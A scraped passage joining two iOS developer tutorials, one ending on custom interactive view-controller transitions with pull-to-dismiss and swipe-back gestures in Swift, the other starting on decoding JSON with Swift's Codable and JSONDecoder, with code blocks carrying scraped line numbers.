+ func animationEnded(_ transitionCompleted: Bool) {
+ // Clear the animator when the animation is complete
+ self.animatorForCurrentTransition = nil
+ }
+
+}
+
In interactive scenarios (detailed later in the control section), the
interruptibleAnimator
method is used for animations; in non-interactive scenarios, theanimateTransition
method is still used.
Due to its ability to continue and interrupt, the
interruptibleAnimator
method might be called repeatedly; hence, we need to use a global variable to store and access the return value.
Murmur… Actually, I initially wanted to switch entirely to the new UIViewPropertyAnimator
and recommend everyone to use it, but I encountered a very strange issue. When performing a full-page gesture return Pop animation, if the gesture is released and the animation returns to its original position, the items on the Navigation Bar above will flicker with a fade-in and fade-out effect… I couldn’t find a solution, but reverting to UIView.animate
resolved the issue. If there’s something I missed, please let me know <( _ _ )>.
Problem image; + button is from the previous page
So, to be safe, let’s stick with the old method!
In practice, different animation effects will be created in separate classes. If you find the files too cluttered, you can refer to the packaged solution at the end of the article or group related (Present + Dismiss) animations together.
Additionally, if you need more precise control, such as having a specific component within the ViewController change along with the transition animation, you can use the transitionCoordinator
in UIViewController
for coordination. I didn’t use this part; if you’re interested, you can refer to this article.
This is the aforementioned “interactive” part, which is essentially gesture control. This is the most important section of this article because we aim to achieve the functionality of gesture operations linked with transition animations, enabling us to implement pull-to-close and full-page return features.
Similar to the ViewController
delegate animation design mentioned earlier, the interactive handling class also needs to inform the ViewController
in the delegate.
UITabBarController: None UINavigationController (Push/Pop):
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+
import UIKit
+
+class HomeNavigationController: UINavigationController {
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ self.delegate = self
+ }
+
+}
+
+extension HomeNavigationController: UINavigationControllerDelegate {
+ func navigationController(_ navigationController: UINavigationController, animationControllerFor operation: UINavigationController.Operation, from fromVC: UIViewController, to toVC: UIViewController) -> UIViewControllerAnimatedTransitioning? {
+
+ if operation == .pop {
+ return //UIViewControllerAnimatedTransitioning animation to apply when returning
+ } else if operation == .push {
+ return //UIViewControllerAnimatedTransitioning animation to apply when pushing
+ }
+ //Returning nil will use the default animation
+ return nil
+ }
+
+ //Add interactive delegate method:
+ func navigationController(_ navigationController: UINavigationController, interactionControllerFor animationController: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
+ //Cannot determine if it's Pop or Push here, can only judge from the animation itself
+ if animationController is animation applied during push {
+ return //UIPercentDrivenInteractiveTransition interactive control method for push animation
+ } else if animationController is animation applied during return {
+ return //UIPercentDrivenInteractiveTransition interactive control method for pop animation
+ }
+ //Returning nil means no interactive handling
+ return nil
+ }
+}
+
UIViewController (Present/Dismiss):
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+
import UIKit
+
+class HomeAddViewController: UIViewController {
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ self.modalPresentationStyle = .custom
+ self.transitioningDelegate = self
+ }
+
+}
+
+extension HomeAddViewController: UIViewControllerTransitioningDelegate {
+
+ func interactionControllerForDismissal(using animator: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
+ //return nil means no interactive handling
+ return //UIPercentDrivenInteractiveTransition method for interactive control during Dismiss
+ }
+
+ func interactionControllerForPresentation(using animator: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
+ //return nil means no interactive handling
+ return //UIPercentDrivenInteractiveTransition method for interactive control during Present
+ }
+
+ func animationController(forPresented presented: UIViewController, presenting: UIViewController, source: UIViewController) -> UIViewControllerAnimatedTransitioning? {
+ //return nil means using default animation
+ return //UIViewControllerAnimatedTransitioning animation to apply during Present
+ }
+
+ func animationController(forDismissed dismissed: UIViewController) -> UIViewControllerAnimatedTransitioning? {
+ //return nil means using default animation
+ return //UIViewControllerAnimatedTransitioning animation to apply during Dismiss
+ }
+
+}
+
⚠️⚠️⚠️⚠️⚠️
If you implement interactionControllerFor… methods, even if the animation is non-interactive (e.g., self.present system call transition), these methods will still be called for handling; we need to control the
wantsInteractiveStart
parameter inside (introduced below).
Next, let’s talk about the core implementation of UIPercentDrivenInteractiveTransition
.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+
import UIKit
+
+class PullToDismissInteractive: UIPercentDrivenInteractiveTransition {
+
+ //UIView to add gesture control interaction
+ private var interactiveView: UIView!
+ //Current UIViewController
+ private var presented: UIViewController!
+ //Threshold percentage to complete execution, otherwise revert
+ private let thredhold: CGFloat = 0.4
+
+ //Different transition effects may require different information, customizable
+ convenience init(_ presented: UIViewController, _ interactiveView: UIView) {
+ self.init()
+ self.interactiveView = interactiveView
+ self.presented = presented
+ setupPanGesture()
+
+ //Default value, informs the system that the current animation is non-interactive
+ wantsInteractiveStart = false
+ }
+
+ private func setupPanGesture() {
+ let panGesture = UIPanGestureRecognizer(target: self, action: #selector(handlePan(_:)))
+ panGesture.maximumNumberOfTouches = 1
+ panGesture.delegate = self
+ interactiveView.addGestureRecognizer(panGesture)
+ }
+
+ @objc func handlePan(_ sender: UIPanGestureRecognizer) {
+ switch sender.state {
+ case .began:
+ //Reset gesture position
+ sender.setTranslation(.zero, in: interactiveView)
+ //Inform the system that the current animation is triggered by a gesture
+ wantsInteractiveStart = true
+
+ //Call the transition effect to be performed during gesture began (won't execute directly, system will hold it)
+ //Then the corresponding animation for the transition effect will jump to UIViewControllerAnimatedTransitioning for handling
+ // animated must be true otherwise no animation
+
+ //Dismiss:
+ self.presented.dismiss(animated: true, completion: nil)
+ //Present:
+ //self.present(presenting,animated: true)
+ //Push:
+ //self.navigationController.push(presenting)
+ //Pop:
+ //self.navigationController.pop(animated: true)
+
+ case .changed:
+ //Calculate the gesture sliding position corresponding to the animation completion percentage 0~1
+ //Actual calculation method varies depending on the animation type
+ let translation = sender.translation(in: interactiveView)
+ guard translation.y >= 0 else {
+ sender.setTranslation(.zero, in: interactiveView)
+ return
+ }
+ let percentage = abs(translation.y / interactiveView.bounds.height)
+
+ //Update UIViewControllerAnimatedTransitioning animation percentage
+ update(percentage)
+ case .ended:
+ //When the gesture is released, check if the completion percentage exceeds the threshold
+ wantsInteractiveStart = false
+ if percentComplete >= thredhold {
+ //Yes, inform the animation to complete
+ finish()
+ } else {
+ //No, inform the animation to revert
+ cancel()
+ }
+ case .cancelled, .failed:
+ //On cancel or error
+ wantsInteractiveStart = false
+ cancel()
+ default:
+ wantsInteractiveStart = false
+ return
+ }
+ }
+}
+
+//When there are UIScrollView components (UITableView/UICollectionView/WKWebView....) inside UIViewController, prevent gesture conflicts
+//When the UIScrollView component inside has scrolled to the top, enable the gesture operation for interactive transition
+extension PullToDismissInteractive: UIGestureRecognizerDelegate {
+ func gestureRecognizer(_ gestureRecognizer: UIGestureRecognizer, shouldRecognizeSimultaneouslyWith otherGestureRecognizer: UIGestureRecognizer) -> Bool {
+ if let scrollView = otherGestureRecognizer.view as? UIScrollView {
+ if scrollView.contentOffset.y <= 0 {
+ return true
+ } else {
+ return false
+ }
+ }
+ return true
+ }
+
+}
+
*About the reason for sender.setTranslation( .zero, in:interactiveView) supplement point I<
We need to implement different Classes based on different gesture operation effects; if it is the same continuous (Present+Dismii) operation, it can also be wrapped together.
⚠️⚠️⚠️⚠️⚠️
wantsInteractiveStart
must be in a compliant state. IfwantsInteractiveStart = false
is notified during interactive animation, it will also cause the screen to freeze;
You need to exit and re-enter the APP to restore it.
⚠️⚠️⚠️⚠️⚠️
interactiveView must also be isUserInteractionEnabled = true
You can set it more to ensure it!
When we set up this Delegate
and build the Class
, we can achieve the functionality we want. Let’s not waste any more time and go straight to the completed example.
The advantage of custom pull-down is that it supports all iOS versions on the market, can control the overlay percentage, control the trigger close position, and customize the animation effect.
Click the top right + Present page
This is an example of HomeViewController
presenting HomeAddViewController
and HomeAddViewController
dismissing.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+
import UIKit
+
+class HomeViewController: UIViewController {
+
+ @IBAction func addButtonTapped(_ sender: Any) {
+ guard let homeAddViewController = UIStoryboard(name: "Main", bundle: nil).instantiateViewController(identifier: "HomeAddViewController") as? HomeAddViewController else {
+ return
+ }
+
+ //transitioningDelegate can be specified to handle the target ViewController or the current ViewController
+ homeAddViewController.transitioningDelegate = homeAddViewController
+ homeAddViewController.modalPresentationStyle = .custom
+ self.present(homeAddViewController, animated: true, completion: nil)
+ }
+
+}
+import UIKit
+
+class HomeAddViewController: UIViewController {
+
+ private var pullToDismissInteractive: PullToDismissInteractive!
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ //Bind transition interactive information
+ self.pullToDismissInteractive = PullToDismissInteractive(self, self.view)
+ }
+
+}
+
+extension HomeAddViewController: UIViewControllerTransitioningDelegate {
+
+ func interactionControllerForDismissal(using animator: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
+ return pullToDismissInteractive
+ }
+
+ func animationController(forPresented presented: UIViewController, presenting: UIViewController, source: UIViewController) -> UIViewControllerAnimatedTransitioning? {
+ return PresentAndDismissTransition(false)
+ }
+
+ func animationController(forDismissed dismissed: UIViewController) -> UIViewControllerAnimatedTransitioning? {
+ return PresentAndDismissTransition(true)
+ }
+
+ func interactionControllerForPresentation(using animator: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
+ //No Present operation gesture here
+ return nil
+ }
+}
+import UIKit
+
+class PullToDismissInteractive: UIPercentDrivenInteractiveTransition {
+
+ private var interactiveView: UIView!
+ private var presented: UIViewController!
+ private var completion: (() -> Void)?
+ private let threshold: CGFloat = 0.4
+
+ convenience init(_ presented: UIViewController, _ interactiveView: UIView, _ completion: (() -> Void)? = nil) {
+ self.init()
+ self.interactiveView = interactiveView
+ self.completion = completion
+ self.presented = presented
+ setupPanGesture()
+
+ wantsInteractiveStart = false
+ }
+
+ private func setupPanGesture() {
+ let panGesture = UIPanGestureRecognizer(target: self, action: #selector(handlePan(_:)))
+ panGesture.maximumNumberOfTouches = 1
+ panGesture.delegate = self
+ interactiveView.addGestureRecognizer(panGesture)
+ }
+
+ @objc func handlePan(_ sender: UIPanGestureRecognizer) {
+ switch sender.state {
+ case .began:
+ sender.setTranslation(.zero, in: interactiveView)
+ wantsInteractiveStart = true
+
+ self.presented.dismiss(animated: true, completion: self.completion)
+ case .changed:
+ let translation = sender.translation(in: interactiveView)
+ guard translation.y >= 0 else {
+ sender.setTranslation(.zero, in: interactiveView)
+ return
+ }
+
+ let percentage = abs(translation.y / interactiveView.bounds.height)
+ update(percentage)
+ case .ended:
+ if percentComplete >= threshold {
+ finish()
+ } else {
+ wantsInteractiveStart = false
+ cancel()
+ }
+ case .cancelled, .failed:
+ wantsInteractiveStart = false
+ cancel()
+ default:
+ wantsInteractiveStart = false
+ return
+ }
+ }
+}
+
+extension PullToDismissInteractive: UIGestureRecognizerDelegate {
+ func gestureRecognizer(_ gestureRecognizer: UIGestureRecognizer, shouldRecognizeSimultaneouslyWith otherGestureRecognizer: UIGestureRecognizer) -> Bool {
+ if let scrollView = otherGestureRecognizer.view as? UIScrollView {
+ if scrollView.contentOffset.y <= 0 {
+ return true
+ } else {
+ return false
+ }
+ }
+ return true
+ }
+
+}
+
With the above, you can achieve the effect shown in the image. The code here is quite messy due to the simplicity of the tutorial, and there is much room for optimization and integration.
Worth mentioning…
iOS ≥ 13, if the View contains a UITextView, during the pull-down close animation, the text content of the UITextView will be blank; causing a flicker in the experience (video example) …
The solution here is to use
snapshotView(afterScreenUpdates:)
to replace the original View layer during the animation.
When looking for a solution to enable right swipe back gesture for the entire screen, I found a Tricky method: Directly add a UIPanGestureRecognizer
to the screen and then set the target
and action
to the native interactivePopGestureRecognizer
, action:handleNavigationTransition
. *Detailed method click me<
That’s right! It looks like a Private API, and it feels like it might get rejected during review; also, it’s uncertain if it works with Swift, as it might use Runtime features specific to Objective-C.
Using the same method as in this article, we handle the navigationController
POP back ourselves; add a full-page right swipe gesture control with a custom right swipe animation!
Other parts are omitted, only the key animation and interaction handling class is posted:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+
import UIKit
+
+class SwipeBackInteractive: UIPercentDrivenInteractiveTransition {
+
+ private var interactiveView: UIView!
+ private var navigationController: UINavigationController!
+
+ private let threshold: CGFloat = 0.4
+
+ convenience init(_ navigationController: UINavigationController, _ interactiveView: UIView) {
+ self.init()
+ self.interactiveView = interactiveView
+
+ self.navigationController = navigationController
+ setupPanGesture()
+
+ wantsInteractiveStart = false
+ }
+
+ private func setupPanGesture() {
+ let panGesture = UIPanGestureRecognizer(target: self, action: #selector(handlePan(_:)))
+ panGesture.maximumNumberOfTouches = 1
+ interactiveView.addGestureRecognizer(panGesture)
+ }
+
+ @objc func handlePan(_ sender: UIPanGestureRecognizer) {
+
+ switch sender.state {
+ case .began:
+ sender.setTranslation(.zero, in: interactiveView)
+ wantsInteractiveStart = true
+
+ self.navigationController.popViewController(animated: true)
+ case .changed:
+ let translation = sender.translation(in: interactiveView)
+ guard translation.x >= 0 else {
+ sender.setTranslation(.zero, in: interactiveView)
+ return
+ }
+
+ let percentage = abs(translation.x / interactiveView.bounds.width)
+ update(percentage)
+ case .ended:
+ if percentComplete >= threshold {
+ finish()
+ } else {
+ wantsInteractiveStart = false
+ cancel()
+ }
+ case .cancelled, .failed:
+ wantsInteractiveStart = false
+ cancel()
+ default:
+ wantsInteractiveStart = false
+ return
+ }
+ }
+}
+
On the View, pull up to fade in + pull down to close, which creates a transition effect similar to Spotify’s player!
This part is more tedious, but the principle is the same. I won’t post it here, but interested friends can refer to the GitHub example content.
One thing to note is that when pulling up to fade in, the animation must ensure that it uses “.curveLinear” linear, otherwise there will be a problem where the pull-up does not follow the hand; the degree of pull and the displayed position are not proportional.
Completed Image
This article is very long and took me a long time to organize and produce. Thank you for your patience in reading.
References:
For elegant code encapsulation references:
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
From basic to advanced, deeply using Decodable to meet all possible problem scenarios
Photo by Gustas Brazaitis
Due to the backend API upgrade, we need to adjust the API processing architecture. Recently, we took this opportunity to update the original network processing architecture written in Objective-C to Swift. Due to the different languages, it is no longer suitable to use the original Restkit to handle our network layer applications. However, it must be said that Restkit’s functionality is very powerful, and it was used very effectively in the project with almost no major issues. But it is relatively cumbersome, almost no longer maintained, and purely Objective-C. It will inevitably need to be replaced in the future.
Restkit almost handled all the network request-related functions we needed, from basic network processing, API calls, network processing, to response processing JSON String to Object, and even storing objects into Core Data. It was a framework that could handle ten tasks at once.
With the evolution of the times, the current frameworks no longer focus on an all-in-one package but more on flexibility, lightness, and combination, increasing more flexibility and creating more variations. Therefore, when replacing it with Swift, we chose to use Moya as the network processing part of the package, and other functions we needed were combined in other ways.
For the JSON String to Object Mapping part, we use Swift’s built-in Codable (Decodable) protocol & JSONDecoder for processing. We split the Entity/Model to enhance responsibility separation, operation, and readability. Additionally, we also need to consider the code base mixing Objective-C and Swift.
* The Encodable part is omitted, and the examples only show the implementation of Decodable. They are similar; if you can decode, you can also encode.
Assume our initial API Response JSON String is as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
{
+ "id": 123456,
+ "comment": "It's Accusefive, not Five Accuse!",
+ "target_object": {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars"
+ },
+ "commenter": {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli",
+ "email": "zhgchgli@gmail.com"
+ }
+}
+
From the above example, we can split it into three entities & models: User, Song, and Comment. For convenience, let’s write the Entity/Model in the same file.
User:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+
// Entity:
+struct UserEntity: Decodable {
+ var id: Int
+ var name: String
+ var email: String
+}
+
+//Model:
+class UserModel: NSObject {
+ init(_ entity: UserEntity) {
+ self.id = entity.id
+ self.name = entity.name
+ self.email = entity.email
+ }
+ var id: Int
+ var name: String
+ var email: String
+}
+
Song:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
// Entity:
+struct SongEntity: Decodable {
+ var id: Int
+ var name: String
+}
+
+//Model:
+class SongModel: NSObject {
+ init(_ entity: SongEntity) {
+ self.id = entity.id
+ self.name = entity.name
+ }
+ var id: Int
+ var name: String
+}
+
Comment:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+
// Entity:
+struct CommentEntity: Decodable {
+ enum CodingKeys: String, CodingKey {
+ case id
+ case comment
+ case targetObject = "target_object"
+ case commenter
+ }
+
+ var id: Int
+ var comment: String
+ var targetObject: SongEntity
+ var commenter: UserEntity
+}
+
+//Model:
+class CommentModel: NSObject {
+ init(_ entity: CommentEntity) {
+ self.id = entity.id
+ self.comment = entity.comment
+ self.targetObject = SongModel(entity.targetObject)
+ self.commenter = UserModel(entity.commenter)
+ }
+ var id: Int
+ var comment: String
+ var targetObject: SongModel
+ var commenter: UserModel
+}
+
JSONDecoder:
1
+2
+3
+4
+5
+6
+7
+
let jsonString = "{ \"id\": 123456, \"comment\": \"It's Accusefive, not Five Accuse!\", \"target_object\": { \"type\": \"song\", \"id\": 99, \"name\": \"Thinking of You Under the Stars\" }, \"commenter\": { \"type\": \"user\", \"id\": 1, \"name\": \"zhgchgli\", \"email\": \"zhgchgli@gmail.com\" } }"
+let jsonDecoder = JSONDecoder()
+do {
+ let result = try jsonDecoder.decode(CommentEntity.self, from: jsonString.data(using: .utf8)!)
+} catch {
+ print(error)
+}
+
When our JSON String Key Name does not match the Entity Object Property Name, we can add a CodingKeys enum internally to map them, as we cannot control the naming convention of the backend data source.
1
+2
+
case PropertyKeyName = "backend_field_name"
+case PropertyKeyName // If not specified, the default is to use PropertyKeyName as the backend field name
+
Once the CodingKeys enum is added, all non-Optional fields must be enumerated, and you cannot just list the keys you want to customize.
Another way is to set the keyDecodingStrategy of JSONDecoder. If the response data fields and property names differ only by snake_case
<-> camelCase
, you can directly set .keyDecodingStrategy
= .convertFromSnakeCase
to automatically match the mapping.
1
+2
+3
+
let jsonDecoder = JSONDecoder()
+jsonDecoder.keyDecodingStrategy = .convertFromSnakeCase
+try jsonDecoder.decode(CommentEntity.self, from: jsonString.data(using: .utf8)!)
+
1
+2
+3
+
struct SongListEntity: Decodable {
+ var songs:[SongEntity]
+}
+
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
struct SongEntity: Decodable {
+ var id: Int
+ var name: String
+ var type: SongType
+
+ enum SongType {
+ case rock
+ case pop
+ case country
+ }
+}
+
Applicable to string types with a limited range, writing them as Enums makes it convenient for us to pass and use; if a value appears that is not enumerated, decoding will fail!
Assuming the JSON String returned in multiple instances has a fixed format:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
{
+ "count": 10,
+ "offset": 0,
+ "limit": 0,
+ "results": [
+ {
+ "type": "song",
+ "id": 1,
+ "name": "1"
+ }
+ ]
+}
+
You can wrap it using generics:
1
+2
+3
+4
+5
+6
+
struct PageEntity<E: Decodable>: Decodable {
+ var count: Int
+ var offset: Int
+ var limit: Int
+ var results: [E]
+}
+
Usage: PageEntity<Song>.self
Set the dateDecodingStrategy
of JSONDecoder
.secondsSince1970/.millisecondsSince1970
: Unix timestamp.deferredToDate
: Apple’s timestamp, rarely used, different from Unix timestamp, it starts from 2001/01/01.iso8601
: ISO 8601 date format.formatted(DateFormatter)
: Decode Date according to the passed-in DateFormatter.custom
: Custom Date Decode logic.custom example: Assuming the API returns both YYYY/MM/DD and ISO 8601 formats, both need to be decoded:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+
var dateFormatter = DateFormatter()
+var iso8601DateFormatter = ISO8601DateFormatter()
+
+let decoder: JSONDecoder = JSONDecoder()
+decoder.dateDecodingStrategy = .custom({ (decoder) -> Date in
+ let container = try decoder.singleValueContainer()
+ let dateString = try container.decode(String.self)
+
+ //ISO8601:
+ if let date = iso8601DateFormatter.date(from: dateString) {
+ return date
+ }
+
+ //YYYY-MM-DD:
+ dateFormatter.dateFormat = "yyyy-MM-dd"
+ if let date = dateFormatter.date(from: dateString) {
+ return date
+ }
+
+ throw DecodingError.dataCorruptedError(in: container, debugDescription: "Cannot decode date string \(dateString)")
+})
+
+let result = try jsonDecoder.decode(CommentEntity.self, from: jsonString.data(using: .utf8)!)
+
*DateFormatter is very performance-consuming when initialized, try to reuse it as much as possible.
So far, the basic usage has been completed, but the real world is not that simple. Below are some advanced scenarios you might encounter and solutions using Codable. From here on, we can no longer rely on the original Decode to help us with Mapping; we need to implement init(from decoder: Decoder)
for custom Decode operations.
*For now, we will only show the Entity part; the Model is not needed yet.
init decoder, must assign initial values to all non-Optional fields (that’s init!).
When customizing Decode operations, we need to get the container
from the decoder
to operate on the values. There are three types of containers to retrieve content from.
First type container(keyedBy: CodingKeys.self) Operate according to CodingKeys:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+
struct SongEntity: Decodable {
+ var id: Int
+ var name: String
+
+ enum CodingKeys: String, CodingKey {
+ case id
+ case name
+ }
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: CodingKeys.self)
+ self.id = try container.decode(Int.self, forKey: .id)
+ // Parameter 1 accepts support: class implementing Decodable
+ // Parameter 2 CodingKeys
+
+ self.name = try container.decode(String.self, forKey: .name)
+ }
+}
+
Second type singleValueContainer Retrieve the whole package for operation (single value):
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+
enum HandsomeLevel: Decodable {
+ case handsome(String)
+ case normal(String)
+ init(from decoder: Decoder) throws {
+ let container = try decoder.singleValueContainer()
+ let name = try container.decode(String.self)
+ if name == "zhgchgli" {
+ self = .handsome(name)
+ } else {
+ self = .normal(name)
+ }
+ }
+}
+
+struct UserEntity: Decodable {
+ var id: Int
+ var name: HandsomeLevel
+ var email: String
+
+ enum CodingKeys: String, CodingKey {
+ case id
+ case name
+ case email
+ }
+}
+
Suitable for Associated Value Enum field types, for example, name also carries a level of handsomeness!
Third type unkeyedContainer Treat the whole package as an array:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+
struct ListEntity: Decodable {
+ var items:[Decodable]
+ init(from decoder: Decoder) throws {
+ var unkeyedContainer = try decoder.unkeyedContainer()
+ self.items = []
+ while !unkeyedContainer.isAtEnd {
+ // The internal pointer of unkeyedContainer will automatically point to the next object after the decode operation
+ // Until it points to the end, indicating the traversal is complete
+ if let id = try? unkeyedContainer.decode(Int.self) {
+ items.append(id)
+ } else if let name = try? unkeyedContainer.decode(String.self) {
+ items.append(name)
+ }
+ }
+ }
+}
+
+let jsonString = "[\"test\",1234,5566]"
+let jsonDecoder = JSONDecoder()
+let result = try jsonDecoder.decode(ListEntity.self, from: jsonString.data(using: .utf8)!)
+print(result)
+
Applicable to array fields of variable types.
*Flatten data fields (similar to flatMap)
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+
struct ListEntity: Decodable {
+
+ enum CodingKeys: String, CodingKey {
+ case items
+ case date
+ case name
+ case target
+ }
+
+ enum PredictKey: String, CodingKey {
+ case type
+ }
+
+ var date: Date
+ var name: String
+ var items: [Decodable]
+ var target: Decodable
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: CodingKeys.self)
+
+ self.date = try container.decode(Date.self, forKey: .date)
+ self.name = try container.decode(String.self, forKey: .name)
+
+ let nestedContainer = try container.nestedContainer(keyedBy: PredictKey.self, forKey: .target)
+
+ let type = try nestedContainer.decode(String.self, forKey: .type)
+ if type == "song" {
+ self.target = try container.decode(SongEntity.self, forKey: .target)
+ } else {
+ self.target = try container.decode(UserEntity.self, forKey: .target)
+ }
+
+ var unkeyedContainer = try container.nestedUnkeyedContainer(forKey: .items)
+ self.items = []
+ while !unkeyedContainer.isAtEnd {
+ if let song = try? unkeyedContainer.decode(SongEntity.self) {
+ items.append(song)
+ } else if let user = try? unkeyedContainer.decode(UserEntity.self) {
+ items.append(user)
+ }
+ }
+ }
+}
+
Access and decode objects of different levels. The example demonstrates using nestedContainer to flatten out the type for target/items and then decode accordingly based on the type.
*The above is just a brief introduction to the methods and functions of init decoder and container. It’s okay if you don’t understand; we’ll dive directly into real-world scenarios and experience the combined operations in the examples.
Returning to the original example JSON String.
targetObject
field could be User
or Song
. How should we handle it?1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+
{
+ "results": [
+ {
+ "id": 123456,
+ "comment": "It's Accusefive, not Five Accuse!",
+ "target_object": {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars"
+ },
+ "commenter": {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli",
+ "email": "zhgchgli@gmail.com"
+ }
+ },
+ {
+ "id": 55,
+ "comment": "66666!",
+ "target_object": {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli"
+ },
+ "commenter": {
+ "type": "user",
+ "id": 2,
+ "name": "aaaa",
+ "email": "aaaa@gmail.com"
+ }
+ }
+ ]
+}
+
Using Enum as a container for Decode.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+
struct CommentEntity: Decodable {
+
+ enum CodingKeys: String, CodingKey {
+ case id
+ case comment
+ case targetObject = "target_object"
+ case commenter
+ }
+
+ var id: Int
+ var comment: String
+ var targetObject: TargetObject
+ var commenter: UserEntity
+
+ enum TargetObject: Decodable {
+ case song(SongEntity)
+ case user(UserEntity)
+
+ enum PredictKey: String, CodingKey {
+ case type
+ }
+
+ enum TargetObjectType: String, Decodable {
+ case song
+ case user
+ }
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: PredictKey.self)
+ let singleValueContainer = try decoder.singleValueContainer()
+ let targetObjectType = try container.decode(TargetObjectType.self, forKey: .type)
+
+ switch targetObjectType {
+ case .song:
+ let song = try singleValueContainer.decode(SongEntity.self)
+ self = .song(song)
+ case .user:
+ let user = try singleValueContainer.decode(UserEntity.self)
+ self = .user(user)
+ }
+ }
+ }
+}
+
We change the targetObject
property to an Associated Value Enum, deciding what content to put inside the Enum during Decode.
The core practice is to create a Decodable Enum as a container, decode it by first extracting the key field (the type
field in the example JSON String), and if it is Song
, use singleValueContainer to decode the whole package into SongEntity
, and similarly for User
.
Extract from Enum when using:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
//if case let
+if case let CommentEntity.TargetObject.user(user) = result.targetObject {
+ print(user)
+} else if case let CommentEntity.TargetObject.song(song) = result.targetObject {
+ print(song)
+}
+
+//switch case let
+switch result.targetObject {
+case .song(let song):
+ print(song)
+case .user(let user):
+ print(user)
+}
+
Declare the field property as Base Class.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+
struct CommentEntity: Decodable {
+ enum CodingKeys: String, CodingKey {
+ case id
+ case comment
+ case targetObject = "target_object"
+ case commenter
+ }
+ enum PredictKey: String, CodingKey {
+ case type
+ }
+
+ var id: Int
+ var comment: String
+ var targetObject: Decodable
+ var commenter: UserEntity
+
+ init(from decoder: Decoder) throws {
